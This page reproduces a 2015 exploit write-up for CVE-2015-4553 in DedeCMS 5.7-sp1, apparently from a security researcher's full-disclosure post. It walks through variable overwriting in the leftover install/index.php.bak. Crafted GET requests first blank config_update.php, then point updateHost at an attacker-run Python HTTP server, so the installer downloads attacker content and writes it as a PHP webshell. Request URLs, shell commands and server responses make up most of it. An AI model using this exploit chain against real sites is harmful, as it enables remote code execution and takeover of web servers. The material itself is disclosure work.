扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 |
========================== # Exploit Title: Dedecms variable coverage leads to getshell # Date: 26-06-2015 # Vendor Homepage: http://www.dedecms.com/] # Version: dedecms 5.7-sp1 and all old version # CVE : CVE-2015-4553 =========================== [CVE-2015-4553]Dedecms variable coverage leads to getshell ############################################################################# # # DBAPPSECURITYLIMITED http://www.dbappsecurity.com.cn/ # ############################################################################# # # CVE ID: CVE-2015-4553 # Subject: Dedecms variable coverage leads to getshell # Author: zise # Date: 06.17.2015 ############################################################################# Introduction: ======== dedecms Open source cms Extensive application Influence version Newest dedecms 5.7-sp1 and all old version Remote getshell Details: ======= After the default installation of dedecms Installation directory /install/index.php or /install/index.php.bak /install/index.php //run iis apache exploit /install/index.php.bak //run apache exploit Code analysis /install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb ############################################################################# 17 $install_demo_name = 'dedev57demo.txt'; 18 $insLockfile = dirname(__FILE__).'/install_lock.txt'; here $install_demo_name and $insLockfile definition // echo $install_demo_name;printf dedev57demo.txt 29 foreach(Array('_GET','_POST','_COOKIE') as $_request) 30 { 31foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v); 32 } // echo $install_demo_name; printf aaaa $install_demo_name by variable coverage The same 17 $install_demo_name = 'dedev57demo.txt'; 18 $insLockfile = dirname(__FILE__).'/install_lock.txt'; variable coverage ############################################################################# GETSHELL Step 1 Clear file contents config_update.php ############################################################################# config_update.php 13 $updateHost = 'http://updatenew.dedecms.com/base-v57/'; 14 $linkHost = 'http://flink.dedecms.com/server_url.php'; In order to obtain the webshell need to control $updateHost So the use of variable coverags cleared config_update.php http://192.168.204.135/install/index.php.bak ?step=11 &insLockfile=a &s_lang=a &install_demo_name=../data/admin/config_update.php index.php.bak 373 else if($step==11) 374 { 375 require_once('../data/admin/config_update.php'); 376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt"; 377 378 $sql_content = file_get_contents($rmurl); 379 $fp = fopen($install_demo_name,'w'); 380 if(fwrite($fp,$sql_content)) 381 echo ' <font color="green">[√]</font> 存在(您可以选择安装进行体验)'; 382 else 383 echo ' <font color="red">[×]</font> 远程获取失败'; 384 unset($sql_content); 385 fclose($fp); 386 exit(); 387 } ### HTTP/1.1 200 OK Date: Wed, 17 Jun 2015 06:55:23 GMT Server: Apache/2.4.12 X-Powered-By: PHP/5.6.6 Vary: User-Agent Content-Length: 55 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 <font color="red">[×]</font> 远程获取失败 ### ###After execution file 0 byte ~ho~year~#### 2015/06/1714:55 0 config_update.php 1 file0 byte GETSHELL Step 2 ############################################################################# Create local HTTP services zise:tmp zise$ ifconfig en0 en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 inet 119.253.3.18 netmask 0xffffff00 broadcast zise:tmp zise$ mkdir "dedecms" zise:tmp zise$ cd dedecms/ zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt zise:dedecms zise$ cd ../ zise:tmp zise$ python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 - #### http://192.168.204.135/install/index.php.bak ?step=11 &insLockfile=a &s_lang=a &install_demo_name=hello.php &updateHost=http://119.253.3.18:8000/ #### HTTP/1.1 200 OK Date: Wed, 17 Jun 2015 07:11:18 GMT Server: Apache/2.4.12 X-Powered-By: PHP/5.6.6 Vary: Accept-Encoding,User-Agent Content-Length: 81 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 <font color="green">[√]</font> 存在(您可以选择安装进行体验) index.php.bak 373 else if($step==11) 374 { 375 require_once('../data/admin/config_update.php'); 376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt"; 377 378 $sql_content = file_get_contents($rmurl); 379 $fp = fopen($install_demo_name,'w'); 380 if(fwrite($fp,$sql_content))//fwrite websehll 381 echo ' <font color="green">[√]</font> 存在(您可以选择安装进行体验)'; 382 else 383 echo ' <font color="red">[×]</font> 远程获取失败'; 384 unset($sql_content); 385 fclose($fp); 386 exit(); 387 } Attack complete you webshell http://192.168.204.135/install/hello.php > zise ^_^ > Security researcher This is the vulnerability of some web pages http://seclists.org/fulldisclosure/2015/Jun/47 |
体验盒子
